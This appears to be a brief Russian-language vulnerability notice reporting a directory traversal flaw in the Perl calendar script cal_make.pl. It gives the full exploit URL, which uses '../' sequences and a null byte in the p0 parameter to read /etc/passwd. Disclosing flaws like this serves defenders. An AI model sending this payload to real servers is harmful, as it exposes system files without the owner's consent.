Еще одна дырка в скрипте.
Кто: cal_make.pl, http://www.perlcal.com
Что:
http://www.VULNERABLE.com/cgi-bin/ cal_make.pl?
p0=../../../../../../../../../../../../ etc/passwd%00
Показывает файл, если
пользователь, от которого запущен сервер,
имеет доступ.